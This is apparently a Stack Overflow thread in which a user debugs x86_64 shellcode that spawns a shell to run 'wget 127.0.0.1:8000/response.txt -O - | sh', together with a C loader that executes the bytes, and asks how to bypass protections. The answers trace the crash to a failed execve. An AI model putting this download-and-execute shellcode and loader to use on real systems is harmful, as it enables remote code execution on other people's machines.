# Linux x86_64 Assembly works standalone, but Segfaults when ran as shellcode in C

Tags: linux, shellcode, assembly, gcc

I wrote a NASM program that uses the `execve` system call to run `wget` inside a newly spawned shell and execute the retrieved page:

```
[bits 64]
global _start
section .text
    _start: 
    xor rcx, rcx
    push rcx    ; first 4
    mov rcx, "/bin//sh"
    push rcx    ; second 4 (8)
    
    mov rdi, rsp    ; /bin/sh
    
    xor rcx, rcx        ; "/bin/sh"
    push rcx
    mov rcx, "/bin//sh"
    push rcx
    mov rdx, rsp    ; save to rdx

    xor rcx, rcx        ; "-c"
    push rcx
    mov cx, "-c"
    push rcx
    mov rbx, rsp    ; save to rbx   

    xor rcx, rcx        ; "/bin/wget 127.0.0.1:8000/response.txt -O - | sh"
    push rcx
    mov rcx, " - | sh "
    push rcx

    xor rcx, rcx
    mov rcx, "e.txt -O"
    push rcx
    
    xor rcx, rcx
    mov rcx, "/respons"
    push rcx
    
    xor rcx, rcx
    mov rcx, "0.1:8000"
    push rcx
    
    xor rcx, rcx
    mov rcx, "t 127.0."
    push rcx

    xor rcx, rcx
    mov rcx, "/bin/wge"
    push rcx
    mov rax, rsp    ; save to rax

    xor rcx, rcx
    push rcx
    
    push rax
    push rbx
    push rdx

    xor rax, rax
    mov al, 59
    mov rsi, rsp
    xor rdx, rdx
    cdq
    syscall
```

When compiled and linked with `nasm -f elf64 file.asm && ld file.o -o file`, the resulting binary works without a problem on my 5.15.0 kernel

```
$ ./ev_shellcode 
--2022-09-25 04:54:57--  http://127.0.0.1:8000/response.txt
Connecting to 127.0.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22 [text/plain]
Saving to: 'STDOUT'

-                                                  100%[================================================================================================================>]      22  --.-KB/s    in 0s      

2022-09-25 04:54:57 (1.83 MB/s) - written to stdout [22/22]
```

However, when I try to include this program as shellcode in C, I get a segfault
(compiled with `gcc -Wall --std=c99 -g -O0 -m64 -no-pie -z execstack -fno-stack-protector shellcode_test.c -o shellcode_test`)

```
#include <unistd.h>
#include <sys/mman.h>
#include <unistd.h>

const char shellcode[] = "\x48\x31\xc9\x51\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x51\x48\x89\xe7\x48\x31\xc9\x51\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x51\x48\x89\xe2\x48\x31\xc9\x51\x66\xb9\x2d\x63\x51\x48\x89\xe3\x48\x31\xc9\x51\x48\xb9\x20\x2d\x20\x7c\x73\x68\x20\x51\x48\x31\xc9\x48\xb9\x65\x2e\x74\x78\x20\x2d\x4f\x51\x48\x31\xc9\x48\xb9\x2f\x72\x65\x73\x6f\x6e\x73\x51\x48\x31\xc9\x48\xb9\x30\x2e\x31\x3a\x30\x30\x30\x51\x48\x31\xc9\x48\xb9\x74\x20\x31\x32\x2e\x30\x2e\x51\x48\x31\xc9\x48\xb9\x2f\x62\x69\x6e\x77\x67\x65\x51\x48\x89\xe0\x48\x31\xc9\x51\x50\x53\x52\x48\x31\xc0\xb0\x3b\x48\x89\xe6\x48\x31\xd2\x99\x0f\x05";

int main() {
  long page_size = sysconf(_SC_PAGESIZE);
  void *page_start = (void *) ((long) shellcode & -page_size);
  if (mprotect(page_start, page_size * 2, PROT_READ | PROT_EXEC)) {
    perror("mprotect");
  } else {
    (*(void(*)())shellcode)();
  }
}
~
```

GDB-GEF:

```
Program received signal SIGSEGV, Segmentation fault.
0x00000000004020bc in ?? ()

[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0xfffffffffffffffe
$rbx   : 0x007fffffffdd68  →  0x0000000000632d ("-c"?)
$rcx   : 0x000000004020b5  →  <shellcode+149> add BYTE PTR [rbp+0x70], ch
$rdx   : 0x0               
$rsp   : 0x007fffffffdd40  →  0x007fffffffdd78  →  0x0000000000000000
$rbp   : 0x007fffffffdda0  →  0x0000000000000001
$rsi   : 0x007fffffffdd40  →  0x007fffffffdd78  →  0x0000000000000000
$rdi   : 0x007fffffffdd80  →  0x0000000000000000
$rip   : 0x000000004020bc  →  0x3b031b0100007463 ("ct"?)
$r8    : 0x007ffff7f8bf10  →  0x0000000000000004
$r9    : 0x007ffff7fc9040  →  <_dl_fini+0> endbr64 
$r10   : 0x007ffff7d792e0  →  0x000f0022000056ec
$r11   : 0x246             
$r12   : 0x007fffffffdeb8  →  0x007fffffffe227  →  "/home/user/Desktop/playground/ASM/shellcode_test"
$r13   : 0x00000000401176  →  <main+0> endbr64 
$r14   : 0x00000000403e18  →  0x00000000401140  →  <__do_global_dtors_aux+0> endbr64 
$r15   : 0x007ffff7ffd040  →  0x007ffff7ffe2e0  →  0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffdd40│+0x0000: 0x007fffffffdd78  →  0x0000000000000000    ← $rsp, $rsi
0x007fffffffdd48│+0x0008: 0x007fffffffdd68  →  0x0000000000632d ("-c"?)
0x007fffffffdd50│+0x0010: 0x007fffffffdd60  →  0x0000000000000000
0x007fffffffdd58│+0x0018: 0x0000000000000000
0x007fffffffdd60│+0x0020: 0x0000000000000000
0x007fffffffdd68│+0x0028: 0x0000000000632d ("-c"?)   ← $rbx
0x007fffffffdd70│+0x0030: 0x0000000000000000
0x007fffffffdd78│+0x0038: 0x0000000000000000
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x4020b5 <shellcode+149>  add    BYTE PTR [rbp+0x70], ch
     0x4020b8                  jb     0x402129
     0x4020ba                  je     0x402121
 →   0x4020bc                  movsxd esi, DWORD PTR [rax+rax*1+0x0]
     0x4020c0 <__GNU_EH_FRAME_HDR+0> add    DWORD PTR [rbx], ebx
     0x4020c2 <__GNU_EH_FRAME_HDR+2> add    edi, DWORD PTR [rbx]
     0x4020c4 <__GNU_EH_FRAME_HDR+4> xor    al, 0x0
     0x4020c6 <__GNU_EH_FRAME_HDR+6> add    BYTE PTR [rax], al
     0x4020c8 <__GNU_EH_FRAME_HDR+8> add    eax, 0x60000000
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "shellcode_test", stopped 0x4020bc in ?? (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x4020bc → movsxd esi, DWORD PTR [rax+rax*1+0x0]
[#1] 0x7fffffffdd78 → add BYTE PTR [rax], al
[#2] 0x7fffffffdd68 → sub eax, 0x63
[#3] 0x7fffffffdd60 → add BYTE PTR [rax], al
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
```

strace:

```
strace ./shellcode_test
execve("./shellcode_test", ["./shellcode_test"], 0x7fffffffdf20 /* 59 vars */) = 0
brk(NULL)                               = 0x405000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffffffdd50) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fbb000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=136203, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 136203, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7f99000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0i8\235HZ\227\223\333\350s\360\352,\223\340."..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7d71000
mmap(0x7ffff7d99000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7ffff7d99000
mmap(0x7ffff7f2e000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7ffff7f2e000
mmap(0x7ffff7f86000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7ffff7f86000
mmap(0x7ffff7f8c000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7f8c000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7d6e000
arch_prctl(ARCH_SET_FS, 0x7ffff7d6e740) = 0
set_tid_address(0x7ffff7d6ea10)         = 238779
set_robust_list(0x7ffff7d6ea20, 24)     = 0
rseq(0x7ffff7d6f0e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7ffff7f86000, 16384, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7ffff7ffb000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ffff7f99000, 136203)          = 0
mprotect(0x402000, 8192, PROT_READ|PROT_EXEC) = 0
execve("", ["", "-c", ""], NULL)        = -1 ENOENT (No such file or directory)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xfffffffffffffffc} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
```

checksec:

```
Canary                        : ✘ 
NX                            : ✘ 
PIE                           : ✘ 
Fortify                       : ✘ 
RelRO                         : Partial
```

Is this a new protection feature by Linux or GCC? If so, is there a way to bypass it?

Answer (score 3):

This line seems to describe what actually killed it.

```
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xfffffffffffffffc} ---
```

It's attempting to access something at `0xfffffffffffffffc`, and `SEGV_MAPERR` means [it's not mapped into the address space](https://stackoverflow.com/questions/1000002/what-is-segv-maperr).  It also shows that `$rax` is `0xfffffffffffffffe` (-2), causing the `movsxd esi, DWORD PTR [rax+rax*1+0x0]` to do this.  The question is why.

By using `gdb` and using `stepi` once you're about to call `shellcode`, you can see what's going on.

```
(gdb) stepi
0x0000000000402020 in shellcode ()
(gdb) disassemble
Dump of assembler code for function shellcode:
=> 0x0000000000402020 <+0>:     xor    %rcx,%rcx
   0x0000000000402023 <+3>:     push   %rcx
   0x0000000000402024 <+4>:     movabs $0x5168732f6e69622f,%rcx
   0x000000000040202e <+14>:    mov    %rsp,%rdi
...
   0x00000000004020b2 <+146>:   cltd
   0x00000000004020b3 <+147>:   syscall
   0x00000000004020b5 <+149>:   add    %ch,0x70(%rbp)
End of assembler dump.
(gdb)
```

Since you're calling `execve`, it's important that the system call actually succeed.  So let's `stepi` right up to the `syscall` instruction.

```
0x00000000004020b5 in shellcode ()
(gdb) i r
rax            0xfffffffffffffffe  -2
rbx            0x7fffffffe0b8      140737488347320
rcx            0x4020b5            4202677
```

It looks like `execve` is failing with ENOENT, so it keeps executing code beyond the end of `shellcode`.

Comment: It appears that the stack does not get pushed properly. Do you have any ideas for what could be the root cause of this?

Answer (score 2):

I would probably think that this is due to you trying to execute code which is stored in the heap (your shellcode table). The heap in x86-64 architecture does not allow executable code.

One way to get out of this would be to declare and define your shellcode table within the main function. I have not tried it but would bet this would work.